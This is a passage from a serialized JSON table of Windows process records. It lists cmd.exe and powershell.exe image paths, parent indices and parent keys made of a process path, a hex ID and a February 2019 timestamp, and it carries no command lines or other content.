\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"parent_index\":[\"NaN\",\"1002\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"151\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"163\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"152\",\"152\",\"152\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"247\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"256\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"289\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"1002\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"1002\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"33\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"1002\",\"1002\",\"1002\",\"355\",\"1002\",\"1002\",\"1002\",\"1002\",\"375\",\"1002\",\"1002\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"398\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"433\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"444\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"1002\",\"490\",\"490\",\"493\",\"1002\",\"1002\",\"500\",\"1002\",\"512\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"552\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"587\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"1002\",\"1002\",\"1002\",\"1002\",\"663\",\"1002\",\"1002\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"681\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"714\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"811\",\"812\",\"812\",\"812\",\"812\",\"812\",\"817\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"827\",\"812\",\"812\",\"812\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"848\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"1002\",\"1002\",\"1002\",\"904\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"962\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 